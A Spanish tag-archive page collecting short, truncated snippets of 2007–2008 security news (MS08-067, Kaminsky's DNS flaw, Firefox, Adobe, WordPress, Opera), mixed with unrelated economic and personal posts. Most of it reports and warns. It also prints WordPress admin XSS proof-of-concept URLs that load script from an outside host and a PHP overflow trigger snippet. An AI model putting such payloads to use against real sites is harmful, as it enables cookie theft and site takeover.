vulnerabilidad

Por Juan Sheput Luis Carranza, ex Ministro de Economia, hizo perder tiempo a nuestro pais. Mal parada encuentra la crisis internacional a la economia peruana. La sostenibilidad del crecimiento economico esta en cuestion. He aqui algunos de los argumentos del autor en este articulo que gira en torno a la vulnerabilidad de nuestra economía en el [...]

Al grito de ‘no pasarán’, media España anda conmovida por la posible compra de Repsol YPF por parte de Lukoil. Es curioso que la prensa de este país, habitualmente de trinchera y estandarte, se haya unido contra la venta de la petrolera, lo que puede poner de manifiesto dos cosas:- Una, que la operación es tan mala que nadie con dos dedos de frente está en condiciones de aceptarla.- Dos,

Esta vulnerabilidad afecta a Microsoft Windows 2000, Windows XP y Windows Server 2003.PandaLabs ha detectado varios archivos maliciosos que están aprovechando la última vulnerabilidad anunciada por Microsoft (llamada MS08-067) para infectar a los usuarios y robarles datos confidenciales utilizados durante la navegación.Es muy importante que los usuarios actualicen su sistema cuanto antes, ya qu

El laboratorio de detección y análisis de malware de Panda Security, ha detectado varios archivos maliciosos que están aprovechando la última vulnerabilidad anunciada por Microsoft (llamada MS08-067)...

Dado que la "crisis económica y financiera se ha extendido a nivel mundial", creo oportuno exponer aquí el análisis que hace Hannes Androsch (que en su día fue Ministro de Finanzas de Austria) sobre la "influencia de las hipotecas subprime en la estabilidad (o vulnerabilidad sel Sistema Financiero Europeo":"Las innovaciones más notables de las últimas dos décadas han sido financieras. Al ig

Una empresa finlandesa llamada Outpost 24 dice haber descubierto un fallo en el Internet Protocol (IP) que puede provocar una denegación de servicio en todo dispositivo que lo use. Teniendo en cuenta que es labase sobre la que se sustenta toda Internet, es equivalente a decir que se puede provocar la caída de cualquier aparato con comunicación en la Red. Es la tercera "gran alerta" del año. ¿

a unos pocos dias del lanzamiento  de Google Chrome el navegador de google. Por cierto navegador que utlizo en la actualidad nos dimos cuenta de que  su consumo de recursos del computador es menor que la de otro navegadores( firefox 3, opera, IExplorer7,Safari); pues tambien les gana en velocidad a dichos navegadores. pero ya se descubrio una de las primera Vulneravilidades de este gran navegado

Cuando no lleva ni 24 horas en el mercado Google Chrome ya se ha reportado la primera vulnerabilidad.

Ayer les comentaba sobre la Primera Vulnerabilidad en Google Chrome, hoy Rishi Narang ha descubierto una nueva vulnerabilidad que permite bloquear TODAS las pestañas de el ya famoso Navegador de Google. El fallo radica en la librería chrome.dll (versión 0.2.149.27) del navegador que permite bloquear todas las pestañas del Google Chrome mostrando el mensaje “!Vaya¡ Google [...]

Hace seis meses que Dan Kaminski, experto en seguridad online de IOActive descubrió un feroz bug en el sistema DNS (Domain Name System) que es el encargado de traducir los nombres de dominio a direcciones IP y base principal del funcionamiento de Internet hoy en día, el cual permitiría lanzar ataques de phishing deliberadamente haciendo que los usuarios sean redirigidos a sitios web falsificado

CERT ha anunciado un parche para múltiples implementaciones de DNS hoy, de manera masiva para muchas implementaciones diferentes. A principios de este año, el investigador Dan Kaminsky descubrió una vulnerabilidad básica en el protocolo DNS que ayudaría a los atacantes a comprometer cualquier servidor de nombres, incluyendo también a los clientes. Kaminsky ha venido trabajando [...]

El Pastor General de la Iglesia ELIM, Mario Vega, critica un artículo editorial de La Prensa Gráfica. Foto Diario Co Latino/Melvin Rivas.Beatriz CastilloDaniel TrujilloMarielos MárquezGloria Silvia OrellanaRedacción Diario Co LatinoLuego de la tragedia que dejó la muerte de 32 personas fallecidas de la Iglesia Evangélica Elim, la institución religio

Un extraño troyano para Mac OS X ha sido liberado en la Internet. Se trata de un troyano AppleScript-THT que explota una vulnerabilidad en el Apple Remote Desktop Agent al darse a sí mismo privilegios de acceso comprometiendo otras máquinas Mac. El malware, que es capaz de infectar los sistemas Mac OS X 10.4 y 10.5, [...]

Dentro de las modalidades y tipos de servicios que ofrece Ya.com, la más nueva es, Ya.com Total.Este servicio de ADSL incluye teléfono a través de VozIP, en las modalidades de 3, 10 y 20MBDe entre las ventajas, destacar su facil manejo y sobre todo su precio, que ya de por si muy competitivo, nos permite ahorrarnos los 13,90€ de mantenimiento que pagamos todos a Telefónica.Lo peor, que deja

A pocas horas de estar disponible la versión 3 de Firefox se dio a conocer la existencia de una vulnerabilidad que además de afectar a la nueva versión del navegador, también afectaba a la anterior (2.0.x).Pienso que el problema se conocía desde antes y se esperó al lanzamiento para informarlo y ''hacer ruido'', además me resulta curioso leer que en algunos sitios de seguridad se refieran a

No pasó ni un día desde la finalización del Download Day, que ya se reporta una vulnerabilidad crítica en el nuevo navegador de Mozilla. Si hay que creerle a la fuente, el reporte se hizo a pocas horas de comenzado el lanzamiento de Firefox 3.0.

En MuyComputer: Cómo hackear una cafetera

Los ciberdelincuentes están distribuyendo archivos con extensión .swf (la extensión de los archivos de Flash) modificados para aprovechar esta nueva vulnerabilidad en Adobe Flash de dos maneras distintas. En algunos casos, cuando un usuario visita una página web que contiene uno de estos archivos modificados, su navegador interpreta el código incluido en los mismos como una orden para descarg

Post escrito por: Mundos Wow Aviso Importante: Vulnerabilidad de seguridad Desde Blizzard nos alertan que se ha descubierto una vulnerabilidad reciente en el programa Adobe Flash Player que podría afectar a las cuentas de usuarios de World of Warcraft. La versión más reciente de Adobe Flash Player, la 9.0.124.0, no contiene esta vulnerabilidad, así que recomiendan que [...]

La empresa de seguridad iDefense ha informado de una vulnerabilidad en la nueva versión 2.8.1 que fue publicada de Snort, en la cual se suponía que dicha vulnerabilidad estaba corregida. Dicha vulnerabilidad permite a un atacante saltarse las reglas de filtrado de detección de intrusos que tiene la herramienta Snort. Aún no esta muy claro porque iDefense ha revelado los detalles del

Un investigador llamado Aviv Raff ha detectado la presencia de un agujero de seguridad en los navegadores Internet Explorer 7 y 8 Beta de Microsoft al tratar de imprimir una página mostrada en dichas aplicaciones.

Según diversos foros dedicados a Linux, un experto identificado como Luciano Bello habría descubierto que el generador de cifras del paquete OpenSSL para la distribución Debian es previsible. Esto implica que las claves criptográficas creadas con este paquete, muy probablemente pueden ser adivinadas.

Un serio error de scripting ha sido descubierto en Paypal y permitiría a los atacantes crear convincentes páginas spoof (copias) para robar credenciales de autotentificación de usuarios. El bug de cross-site scripting (XSS) es tanto más crítico porque reside en una página que se usa para extender la validación de certificados seguros. El nuevo, y vanamente [...]

Servicio de seguridad Wintercore  nos informa de una vulnerabilidad encontrada en el controlador de audio Realtek HD, en la que un usuario localmente puede ganar privilegios en el sistema y hacerce con él… afortunadamente Realtek ya ha lanzado un parche para solucionar esta vulnerabilidad (versión 1.91) . La vulnerabilidad se encuentra en las solicitudes de [...]

Así es, Apple por fin acaba de parchar una vulnerabilidad de su navegador que le hizo ganar a un investigador de seguridad la suma de 10 mil dólares en la conferencia de seguridad CansecWest. Shane Macaulay en la conferencia CansecWest La falla fue explotada por el investigador independiente de seguridad, Charlie Miller, que obtuvo acceso a la [...]

Windows es, probablemente, el sistema operativo más atacado, muchos dicen que es porque tiene la mayor base de usuarios, otros porque simplemente es inseguro. Sea como sea, los usuarios de Windows deberían hacer todo lo que pueden para proteger sus sistemas y arreglar todos las vulnerabilidades de seguridad para asegurarse que su sistema no será [...]

Se ha encontrado una vulnerabilidad crítica en los sistemas operativos de Windows XP, 2003 y Vista SP1, en la que un usuario puede comprometer el sistema ganando privilegios. La vulnerabilidad es causada debido a un error en el código de NetworkService y LocalService, que permite la ejecución de un código malicioso, pudiendo elevar los privilegios en [...]

Adobe Flash Player es propenso a una vulnerabilidad de desbordamiento de búfer que puede ser explotada de forma remota. Un atacante puede sacar provecho de este problema para ejecutar un código malicioso en el equipo del usuario. Para que la explotación sea exitosa, el usuario debe tener instalada en su PC cualquier versión de Adobe Flash Player anterior a la 9.0.124.0. El ataque puede

El hacker Shane Macaulay en la CanSecWest 2008, pudo hackear el Windows Vista que tenía instalado un portátil Fujitsu U810 gracias a una vulnerabilidad de la versión de Adobe Flash más reciente… esto hizo que ganara el portátil y un premio en efectivo de $5000. Shane firmó un acuerdo de no divulgar esta vulnerabilidad y a [...]

…Una prueba de concepto publicada por milw0rm.com el pasado domingo (30/03/08)… Segun esta prueba de concepto se ha encontra un agujero de seguridad en el Office para XP SP3, especificamente la vulnerabilidad se encuentra en PowerPoint. Una prueba de concepto publicada por milw0rm.com el pasado domingo (30/03/08), puede ser utilizada para la ejecución de código mediante la [...]

He encontrado en el blog Smackdown, un interesante reporte sobre una vulnerabilidad aún no propiamente documentada, y por supuesto aún no parchada en la última versión de WordPress 2.3.3 que permite a un atacante externo crear el directorio /wp-content/1/ el cuál contiene infinidad de enlaces spam. Aparentemente ya existe un exploit para aprovechar dicha vulnerabilidad ya [...]

PandaLabs, el laboratorio de detección y análisis de malware de Panda Security, ha descubierto una nueva vulnerabilidad en la aplicación para bases de datos Microsoft Access. Se trata de un problema de seguridad similar al descubierto hace unos meses, y que fue denominado como CVE-2007-6026. La ahora descubierta afecta a la misma librería msjet40.dll, si [...]

Existen varios sistemas de cifrado para las redes wifi, sin embargo en España inexplicablemente el mas utilizado, es el conocido como  WEP (Wired Equivalent Privacy). Este sistema de cifrado es el mas vulnerable a ataques de tal modo que lo mas lógico seria utilizar el tipo de cifrado WPA (Wi-Fi Protected Access) ya que este sistema [...]

Una vulnerabilidad en Adobe Reader está siendo aprovechada para instalar malwareEl día 6 de febrero Adobe publicaba una nueva versión del popular Adobe Reader que solucionaba varios problemas de seguridad. Sin dar apenas detalles, se recomendaba la actualización a la versión 8.1.2 que solucionaba “múltiples vulnerabilidades de impacto desconocido”.Una actualizacion mas de este famoso lector de archivos pdf...

Opera es un navegador web multiplataforma y se ha descubierto que contiene múltiples vulnerabilidades. La mayor parte de ellas están limitadas a la divulgación de la información pero un error en el manejor de los certificados TLS (o SSL3 como prefieras) podría dar lugar a la ejecución de código arbitrario con privilegios de usuario actual. Afortunadamente ya contamos con actualizaciones para corregir este fallo.

Se ha encontrado una vulnerabilidad en IBM Lotus Dominio Web Access que podría permitir a un atacante ejecutar código arbitrario. El fallo se debe a un error de límites en el control ActiveX dwa7.dwa7.1 de la librería dwa7W.dll a la hora de manejar cadenas asignadas a la propiedad "General ServerName". Esto se podría aprovechar para provocar un desbordamiento de memoria intermedia basado en pila si se le asigna una cadena excesivamente larga y llamando al método InstallBrowserHelperDll. El fallo se da en la versión de la librería 7.0.34.1 aunque otras podrían verse afectadas. leer más

Se han descubierto varias vulnerabilidades criticas en el Mac OS X 10.5 y anteriores que van desde la ejecucion de codigo de manera remota a ataques de denegacion de servicios. La mayor parte de ellas es pueden ejecutar de manera local aunque hay algunas que son remotas. Afortunadamente ya hay una actualizacion del sistema por parte de Apple. Si quereis aumentar esta noticia podéis hacerlo en http://docs.info.apple.com/article.html?artnum=307004 ó http://docs.info.apple.com/article.html?artnum=307041 leer más

Los navegadores basados en Mozilla, incluyendo Firefox, contienen una vulnerabilidad que puede permitir a un atacante la ejecución de código llevando a cabo ataques del tipo Cross-Site-Scripting (XSS), esto es, la posibilidad de eludir las restricciones para ejecutar scripts (archivos de comandos), en ventanas pertenecientes a diferentes dominios.Una prueba de concepto demuestra que los usuarios de Gmail, pueden ser víctimas fáciles de este tipo de ataque, si utilizan por ejemplo Firefox para ingresar a su cuenta Web.El problema está ocasionado por una no adecuada separación de los datos obtenidos utilizando el protocolo JAR, y los datos ofrecidos por el propio sitio Web.El protocolo JAR está diseñado para extraer contenido de archivos comprimidos .ZIP. Mozilla incluye soporte para JAR en sus productos (se manejan como URIs en el formato jar:[url]![/camino/archivo.ext]). El archivo comprimido no necesita tener una extensión .ZIP.Según el blog de GNUCITIZEN, "el contenido de J

Los navegadores basados en Mozilla, incluyendo Firefox, contienen una vulnerabilidad que puede permitir a un atacante la ejecución de código llevando a cabo ataques del tipo Cross-Site-Scripting (XSS), esto es, la posibilidad de eludir las restricciones para ejecutar scripts (archivos de comandos), en ventanas pertenecientes a diferentes dominios. Una prueba de concepto demuestra que los usuarios

Adobe en el día de hoy ha lanzado un parche de seguridad para solucionar una vulnerabilidad crítica encontrada en Adobe Reader 8.01 y versiones anteriores, Adobe Acrobat Professional, 3D y Standard 8.1, Adobe Acrobat Professional, Standard, 3D y Elements 7.0.9, bajo el sistema operativo de Windows XP con Internet Explorer instalado. De esta manera Adobe da carpetazo a la vulnerabilidad encontrada por Petko D. Petkov de GNUCitizen.org hace ya meses, en la que podía permitir a un hacker hacerse con el sistema mediante un PDF hecho a mano, y que ha sido criticado por muchos usuarios por la tardanza de una solución definitiva a este problema. Compártelo

La vulnerabilidad de las redes de Telecomunicaciones puede verse desde tres aspectos:* Desde su funcionabilidad,* Desde su capacidad,* Y por su administración.FuncionabilidadSe refiere a los sistemas y equipos electrónicos que operan para que una comunicación se realice, entre ellos:* las redes de acceso,* la central telefónica,* las redes troncales de interconexión y los* sistemas de energía eléctrica que alimentan a los equipos.La funcionalidad se mantiene:* al prever de redundancia a los equipos ante una posible falla,* al implementar rutas alternas de desborde del tráfico ante la rotura de una de una red troncal, y* al instalar sistemas de respaldo de energía eléctrica compuestos por baterías y grupos electrógenos.CapacidadUn sistema de telecomunicaciones es diseñado para una demanda prevista de comunicaciones simultáneas.El supuesto de tráfico, es el parámetro más importante en el dimensionamiento de una red.Los incrementos en la demanda son también previstos en

Hasta la ultima actualización (13 Octubre/07), se podía observar "en vivo" cuan poderoso y peligroso puede ser el hecho de cometer un pequeño error u olvido en la programación de aplicaciones a las cuales se tiene acceso público (Internet). Uno de las vulnerabilidades más típicas que se encuentran en los sitios webs son del tipo FI (File Inclusion) o inclusión de archivos. Esto significa que

Hablando con D, me hizo reaccionar sobre un tema que si lo razoné antes, no le di demasiada importancia. O en realidad sí se la di, mas no me importó.El tema sobre el que hablábamos es la vulnerabilidad de la exposición.Yo cuando escribo acá, dejo entrever a mis lectores cosas personales de mi vida, que probablemente no se enterarían en otras circunstancias. Porque la verdad de la milanesa es que uno cuando escribe deja ver parte del alma.Y eso a veces tiene consecuencias desagradables. Otras tantas veces no, porque uno se retroalimenta de la experiencia y peripecias de los demás.¿Qué tan expuestos estamos los que dejamos nuestra forma de pensar en palabras en un ámbito así?. Depende el tipo de cosas que publiquemos, aunque siempre vamos a dejar entrever nuestra opinión personal (es la idea también, ¿no?). En mi caso particular, como me decía A, este blog es muy yo.Y a veces pienso que llego a un grado de exposición pública mayor al que pensaba, porque quien me habla

Un hacker autonombrado pdp dice, en su sitio web, haber encontrado una vulnerabilidad crítica en la aplicación para leer documentos PDF de Adobe Acrobat. Solo afecta a los sistemas operativos Windows XP SP2 y Windows 2003, mientras que Windows Vista, OS X y Linux están a salvo.La vulnerabilidad consiste en un error en el lenguaje script del Adobe Acrobat que permite ejecutar cualquier aplicación, virus o troyano. El error solo afecta a las versiones del Acrobat Reader 7.0, 8.0 y 8.1 ya sea en las versión completa o la que se abre dentro de nuestro navegador.Como recomendación, aunque suene lógico, no abráis ningún archivo PDF que llegue de desconocidos o de páginas web que no sean conocidas hasta que Adobe saque un parche para dicha vulnerabilidad.Información extraída de: SomosPC

Vulnerabilidad: Error HumanoSuscribirse para recibir las ultimas publicaciones del Blog http://seguridad-informacion.blogspot.com/

Una vulnerabilidad reportada en Opera, podría ser potencialmente explotada por personas maliciosas para comprometer la seguridad de los sistemas con versiones del navegador anteriores a la 9.23.El error lo provoca la acción de un puntero nulo (un indicador que apunta a una zona de memoria prohibida), por un error no especificado cuando Opera procesa determinado código en JavaScript.Esto puede ser explotado para ejecutar código de forma arbitraria, simplemente por visitar un sitio web controlado por un atacante.Son vulnerables todas las versiones anteriores a Opera 9.23.Solución:Actualizarse a la versión 9.23 desde el siguiente enlace:www.opera.com/download/Información extraída de: LaFlecha.net

Apple está siendo presionada para lanzar un parche de seguridad para los iPhone antes de la conferencia de seguridad Black Hat 2007, donde seguramente los investigadores de la seguridad independiente harán publica el funcionamiento de esta vulnerabilidad, encontrada este lunes. La vulnerabilidad puede hacer que simplemente visitando una Web o entrando en un foro, un hacker pueda hacerse con el control del iPhone, incluso de su cámara de fotos. El CEO Roberto Gram comunicó que Apple está siendo presionada a encontrar solución a esta vulnerabilidad, por reputación de la empresa y por los clientes, y se siente mal por todas las vulnerabilidades que se están encontrado en los iPhone y todavía no hay ninguna actualización de seguridad. Compártelo

Si usas Firefox en Windows XP y tienes instalado IExplorer 7, estás expuesto a que cualquier enlace sobre el que pulses se convierta en la ejecución remota de un comando o aplicación de tu PC, que queda así expuesto al capricho del atacante, además de forma ilimitada: todo tu ordenador está en sus manos. Como ejemplo, pulsa sobre este enlace. Para protegerse caben varias soluciones: 1. Cambiar el valor a True de los siguientes valores: network.protocol-handler.warn-external-default network.protocol-handler.warn-external.mailto network.protocol-handler.warn-external.news network.protocol-handler.warn-external.nntp network.protocol-handler.warn-external.snews (Accedes a ellos desde la dirección about:config) 2. No abrir enlaces que contengan “%00″ después del protocolo (mailto:, nntp:, news: y demás) 3. Actualizar a Firefox 2.0.0.6, que ya va por su versión RC2 4. Más simple: no usar Windows :-) [Zona Firefox] Compártelo

Expertos en seguridad han dejado al descubierto una vulnerabilidad 0-day en la ultima versión de Firefox, la cual provee control total sobre computadoras con el sistema operativo Windows, cuando se visita un sitio "booby-trapped" con el navegador de Mozilla.La vulnerabilidad consiste en la forma en que Firefox maneja los identificadores uniformes de recursos o URI (uniform resource identifiers) , que es el protocolo que permite al navegador accesar a diferentes programas y otros recursos localizados en la PC. El fallo se produce cuando el navegador es incapaz de procesar correctamente al menos 5 URI diferentes.durante los últimos meses las URI's han surgido como uno de los eslabones mas débiles en la cadena de seguridad. La semana pasada Mozilla libero un parche critico para Firefox, relacionado con el manejo de URI's. Por otro lado Internet Explorer y Trillian Instant Messenger también fueron victimas de este fallo.el problema es resultado de la poca documentación que existe de

Se ha encontrado una vulnerabilidad crítica en el Yahoo Messenger 8.1, aunque la vulnerabilidad fue encontrada el 10 de Abril, no ha sido divulgada hasta el día de hoy por razones desconocidas. La vulnerabilidad es debido a un desbordamiento del almacenador intermediario, cuando el Messenger carga una dirección especialmente hecha a mano para explotar esta vulnerabilidad. Generalmente los hackers están enviando libros de direcciones hechas a mano para explotar esta vulnerabilidad y hacerse con el control de la máquina, ejecutando un código arbritario. Compártelo

Nuevo agujero de seguridad que afecta a los navegadores Firefox e Internet Explorer permite a intrusos instalar comandos ejecutables en un sistema vulnerable.Según algunas fuentes, la falla ocurre debido a que el componente de Internet Explorer que gestiona las direcciones de Internet no excluye códigos malignos.Microsoft no asume responsabilidad alguna por el error. Un portavoz de la compañía asegura que el tema ha sido estudiado acuciosamente, concluyendo que la vulnerabilidad no radica en algún producto de Microsoft.Durante su instalación, Firefox instala un componente denominado "FirefoxURL", que permite a otros programas iniciar el navegador. La vulnerabilidad en cuestión se presenta en el punto de contacto entre Internet Explorer y Firefox. El navegador de Microsoft envía contenidos a FirefoxURL y puede incluir comandos y códigos malignos que ni Firefox ni IE logran neutralizar.Al instalar la partícula "-crome" en el comando de ejecución de Firefox es posible incluso e

Mozillazine responde hoy a la última vulnerabilidad de Firefox respondiendo al debate de quién tiene la responsabilidad de arreglar el problema, ya que los sistemas de Windows afectados tienen que tener Internet Explorer y Firefox instalado. El problema reside en el que in atacante puede engañar a Firefox a ejecutar código malicioso, tal como fue descrito por el investigador de seguridad Thor Larholm. Cuando Firefox se instala en Windows, registra un protocolo URL para apoyar firefoxurl:// URLs, y si IE visita una página que utilice dicho protocolo, lanza a Firefox sin verificarlo, abriendo la posibilidad de mandar código adicional a través de la nueva ventana. Los investigadores andan debatiendo quién tiene la culpa, si es IE por pasar la URL sin verificarla o Firefox por no verficar la nueva ventana. SecurityFocus lo califica como un problema de Microsoft mientras que Secunia lo califica como un problema de Firefox.Symantec, mientras tanto, dice que la culpa es de los dos.En

Se han encontrado alguna vulnerabilidades en Adobe Flash Player, en la que un hacker mediante un archivo SWF puede comprometer a un PC para hacerse con el control. Estos SWF pueden estar perfectamente ubicados en webs maliciosas como método de trampa para los usuarios que las visitan, esta vulnerabilidad afecta a los reproductores 9.0.45.0 y anteriores versiones, también a los reproductores de Adobe Flash básados en sistemas Linux. Adobe recomienda la descarga de su última versión para solucionar este problema. Para la descarga de esta versión: http://www.adobe.com/support/security/bulletins/apsb07-12.html Compártelo

Secunia ha encontrado una vulnerabilidad moderada en GIMP 1.x y GIMP 2.x, la cual puede ser explotada de forma remota para hacerse con el control del Pc. La causa de la vulnerabilidad es debido a un desbordamiento de un número entero dentro de la función “seek_to_and_unpack_pixeldata ()” en plugs-ins/common/psd.c., esto puede ser explotado por un archivo PSD hecho a mano. La vulnerabilidad está confirmada en la versión 2.2.15, aunque las demás versiones pueden estar afectadas. Para más información: http://secunia.com/advisories/25677/ Compártelo

Sunmicrosystems advierte en un comunicado de una vulnerabilidad crítica encontrada en Sun Java Web, que puede ser explotado por los hackers para hacerse con derechos administrativos en la máquina afectada. La vulnerabilidad es causada debido a un error sin especificar por Sunmicrosystems, el la que un usuario puede sobreescribir cualquier archivo de la máquina afectada, incluso llegando a estar afectado el archivo .java.policy. Los sistemas afectados son: Java Web Start 1.x, Sun Java JDK 1.5.x, Sun Java JRE 1.4.x, Sun Java JRE 1.5.x / 5.x y Sun Java SDK 1.4.x. Para más información sobre la vulnerabilidad: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102957-1 Compártelo

De acuerdo a Alexander Concha en buayacorp.com, existe una nueva vulnerabilidad en las versiones Wordpress 2.2 y Wordpress get_accepted_content_type(); // first check if user can upload if(!current_user_can(’upload_files’)) $this->auth_required(__(’You do not have permission to upload files.’)); // check for not found global $entry; $this->set_current_entry($postID); // then whether user can edit the specific post if(!current_user_can(’edit_post’, $postID)) { $this->auth_required(__(’Sorry, you do not have the right to edit this post.’)); } $location = get_post_meta($entry[’ID’], ‘_wp_attached_file’, true); if(!isset($location)) $this->internal_error(__(’Error ocurred while accessing post metadata for file location.’)); $fp = fopen(”php://input”, “rb”); $localfp = fopen($location, “w+”); while(!feof($fp)) { fwrite($localfp,fr

Hoy les traigo otro exploit el cual tiene que ver con Rootkit Revealer, es una traducción directa del texto publicado por EP_X0FF en los foros de sysinternals aquínota:Solamente usenlo si realmnente saben lo que hacen...Rootkit Revelaler (RKR) es un detector de Rookits muy conocido el cual es usado para revelar algunos rootkits de modo usuario así como algunas cuantas cosas del modo kernel. Puede detectar archivos ocultos haciendo lecturas de modo RAW y usando su propio parser para el sistema de archivos. Puede detectar entradas ocultas en el registro volcando directamente desde el disco por medio de un driver y la función ZwSaveKey y utilizando su propio parser para esto. Existen varias maneras de sobrepasar completamente a RKR, pero el detector mismo puede ayudarte a sobrepasarlo. Esta vulnerabilidad esta presente en todas las versiones de RKR inclusive en las más antiguas versiones de línea de comando. El objetivo principal del exploit es usar restricciones del si

US-CERT informa de una nueva vulnerabilidad en el GDI + (Gdiplus.dll) que no maneja de una forma apropiada los archivos ICO, pudiendose causar un DOS, haciendo que el hacker se pueda hacer con la máquina de manera remota US-CERT advierte de que puede haber páginas Webs con un ICO especialmente hecho a mano para explotar esta vulnerabilidad, así mismo están advirtiendo de no entrar en webs no “confiables” Compártelo

A pesar de que PHP haya declarado el problema de desborde de la función chunk_split() como resuelto, el problema todavía persiste según el blog php-security. Al parecer el intento de arreglar el problema originalmente encontrado por la empresa SEC-CONSULT falla en su intento, y además según el mismo blog “no tiene sentido”. A pesar de todo fue incluído en los parches de seguridad lanzados ayer. La prueba que el parche falla está al ejecutar el código siguiente: $a=str_repeat(”A”, 65537); $b=1; $c=str_repeat(”A”, 65537); chunk_split($a,$b,$c); ?> Compártelo

RedHat ha lanzado una actualización para todos los usuarios que utilizen el seamonkey después de encontar una vulnerabilidad crítica. Estas vulnerabilidades pueden ser explotados para que un usuario pueda hacerse con varias restricciones de seguridad y coger información de los Pcs infectados. Tamcién los usuarios pueden expltarlo mediante un e-mail externo con richtext para ejecutar un código arbitrario, pero este e-mail debe de tener una extensión mínima de 400 Mb de largo. Los sistemas que están implicados son: Red Hat Desktop (v. 3) Red Hat Desktop (v. 4) Red Hat Enterprise Linux AS (v. 2.1) Red Hat Enterprise Linux AS (v. 3) Red Hat Enterprise Linux AS (v. 4) Red Hat Enterprise Linux ES (v. 2.1) Red Hat Enterprise Linux ES (v. 3) Red Hat Enterprise Linux ES (v. 4) Red Hat Enterprise Linux WS (v. 2.1) Red Hat Enterprise Linux WS (v. 3) Red Hat Enterprise Linux WS (v. 4) Red Hat Linux Advanced Workstation 2.1 for the Itanium Processor Para más información y soluciones: h

Ubuntu ha lanzado una actualización de freetype después de que encontraran una vulnerabilidad crítica. Esta vulnerabilidad puede hacer que un hacer genere un DOS mediante las fuentes TTF en src/truetype/ttgload.c , en cuestión puede ser atacado el sistema con una TTF hecha a mano. La vulnerabilidad es sobre la versión 2.3.4., aunque se sospecha que otras versiones pueden ser vulnerables igualmente. Para más información y descarga del parche: http://security.ubuntu.com/ubuntu/pool/main/f/freetype /freetype_2.1.10-1ubuntu2.4.diff.gz Compártelo

De acuerdo al blog de hackers.org., hay dos vulnerabilidades importantes en el popular sistema de blog Wordpress. Las vulnerabilidades ocurren en dos problemas XSS cuando el administrador se encuentra en el sistema: http://www.site.com/path.to/wp-admin/post-new.php?text=& popupurl=http%3A%2F%2Fha.ckers.org%2Fxss.html&post_title =%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)’ http://www.site.com/path.to/wp-admin/post-new.php?text=& popupurl=http%3A%2F%2Fha.ckers.org%2Fxss.html &post_title=%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)’ Este script es para Firefox, pero la modificación de IE sería fácil. Un hecker puede robar cookies, moderar comentarios y hasta incluso escribir sus propios ficheros PHP. No hay comentario por parte de Wordpress por ahora. Compártelo

Security.ubuntu nos informa de una nueva vulnerabilidad encontrada en el pulseaudio en el cual pueden ser exploradas para crear una denegación de servicio y un hacker hacerse con el control de la máquina. La vulnerabilidad está causa por un uso incorrecto de assert, el cual procesa ciertas respuestas peticiones a un servidor, estos códigos de las hackers suelen estar hecho a “mano” para hacerse con el sistema. Para más información de esta vulnerabilidad así como descarga del parche: http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/ Compártelo

Se ha encontrado una vulnerabilidad crítica en todas las versiones de Pligg, una de las maneras más rápidas, sencilla y gratuita de creación de páginas estilo Digg. La vulnerabilidad hace que la web sea sensible al ataque de un hacker para hacerse con el control de la web. Se recomienda a todos los administradores de páginas web con Pligg actualizen de inmediato. Más información sobre instalación y parches: http://forums.pligg.com/showthread.php?p=30108 Compártelo

Se ha informado de una nueva vulnerabilidad en el Opera Torrent en el cual un usuario malintencionado puede hacerse con el control de un Pc remotamente. Esta es debido a un error en la dirección de los archivos torrent y se puede explorar para causar un desbordamiento del almacenador cuando un usuario no autorizado lo manipula para intentar ganar derechos. Opera recomienda a todos sus usuarios que actualizen a la versión 9.21 ya que es la única versión que no es vulnerable. Para actualizar seguir el siguiente vínculo: http://www.opera.com/download/ Compártelo

Secunia ha informado de una vulnerabilidad encontrada en el cortafuegos de Norton, el archivo afectado es ISAlertDataCOM ActiveX. La vulnerabilidad está causada por un error en el límite de control de este archivo (ISAlert.dll), esto puede causar un desbordamiento de la memoria haciendo que un usuario malintencionado pueda hacerse con el control de la máquina. Symantec recomienda a todos sus usuarios instalar con urgencia el parche que corrige este problema en: http://securityresponse.symantec.com/avcenter/security/Content/2007.05.16.html Compártelo

secunia.com alerta a los usuarios por otra vulnerabilidad encontrada en los productos de Adobe. Las versiones afectadas son Adobe Photoshop CS2 y CS3 además de Elements 5.X.. La vulnerabilidad está relacionada con el PNG.8BI, el plug in de los productos de Adobe para manejar los archivos .PNG. Esta vulnerabilidad puede hacer que un usuario pueda generar un desbordamiento en la máquina atacada mediante un archivo .PNG previamente tratado por un hacker. Por ahora Adobe no ha lanzado ningún parche para esta vulnerabilidad. Para más información: http://milw0rm.com/exploits/3812 Compártelo

(Cisco) Los servicios de red de Cisco (CNS) (NFC) , se a detectado una vulnerabilidad por usar nombre de usuarios y contraseñas ya impuestos por la empresa por defecto en la aplicación. El conocimiento de estos datos puede hacer que un usuario pueda modificar todo el entorno de red incluso hacerse con el control de una máquina. La compañía Cisco han lanzado un informe por el cual informa a los administradores del sistema de como cambiar estas contraseñas: http://www.cisco.com/warp/public/707/cisco-sa-20070425-nfc.shtml. Compártelo

Secunia.com ha anunciado una vulnerabilidad crítica encontrada en Adobe Photoshop CS2 y CS3, que puede que mediante un ataque de un hacker hacerse con el control total de un Pc. La vulnerabilidad está causada debido a un error en la dirección de la memoria de las imagenes BMP, DIB y RLE., el hacker puede crear un desbordaminento de la memoria enviando una imagén con un código especial permitiendole mediante este código hacerce con el control del Pc. Está vulnerabilidad se ha detectado en Adobe Photoshop CS2 y CS3 pero no se descarta que otras versiones y programas puedan ser vulnerables también. Secunia.com recomienda que ante estos ataques los usuarios no abrán ficheros BMP, DIB y RLE de usuarios desconocidos o webs. Para más información: http://secunia.com/advisories/25023/ Compártelo

El conocido cortafuego ZoneAlarm tiene un fallo que podría utilizarse en un ataque causando una denegación de servicio.   Un cortafuego es una aplicación diseñada para controlar los puertos de comunicación utilizados en el ordenador. Su trabajo es restringir el acceso desde Internet y viceversa, manteniendo la salida y entrada de datos solo de los programas permitidos.Existen un grupo de rutinas dentro de Windows (APIs) que son utilizadas por las aplicaciones para pedir y ejecutar servicios en forma transparente al usuario. Por su lado, Windows tiene una tabla indice dinámica de asignaciones para dirigir correctamente este tráfico. La misma recibe el nombre de SSDT (System Service Descriptor Table). Para realizar su trabajo ZoneAlarm se sirve de múltiples funciones de servicios SSDT. De esta manera intercepta las peticiones de los programas cuyo destino son las API de Windows. Una vez interceptadas, son verificados los privilegios de las peticiones recibidas. Dos de la

